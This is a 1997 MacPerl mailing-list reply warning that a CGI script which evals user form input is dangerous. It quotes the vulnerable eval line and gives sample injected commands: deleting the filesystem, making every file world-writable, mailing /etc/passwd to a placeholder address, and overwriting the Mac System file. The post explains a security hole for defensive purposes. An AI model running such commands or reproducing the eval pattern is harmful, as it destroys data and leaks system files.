[Date Prev][Date Next][Thread Prev][Thread Next] [Search] [Date Index] [Thread Index]

Re: [MacPerl] Dangerous cgi-script

To: mac-perl@iis.ee.ethz.ch
Subject: Re: [MacPerl] Dangerous cgi-script
From: "Brian L. Matthews" <blm@halcyon.com>
Date: Thu, 10 Jul 1997 08:53:06 -0700 (PDT)
In-Reply-To: <v01530501afeab4895ae1@[193.13.228.48]> from "Claes Bjorklund" at Jul 10, 97 04:23:05 pm

|Is this this cgi script dangerous?
|[...]
|$math = $FORM{'calc'};
|$res=eval "$math";

Yes! You really never want to do an eval of a user entered string.
Remember, the string can contain *any perl script*, including a
system call. On Unix, strings like 'system ("rm -rf /")' or
'system ("find / -print | xargs chmod 777")' or
'system ("mail xxx@yyy.zzz </etc/passwd")' are possibilities. On
the Mac you're more limited, but something like
'open F ">Macintosh HD:System Folder:System"' might work, and be
fairly painful.

Anyway, you get the picture.

Brian

***** Want to unsubscribe from this list?
***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch

References:
- [MacPerl] Dangerous cgi-script
  - From: claes@canit.se (Claes Bjorklund)

Prev by Date: Re: [MacPerl] Checking user-id's and paswords
Next by Date: Re: [MacPerl] Dangerous cgi-script
Prev by thread: [MacPerl] Dangerous cgi-script
Next by thread: Re: [MacPerl] Dangerous cgi-script
Navigation: Date Index | Thread Index | Search | Other lists at bumppo.net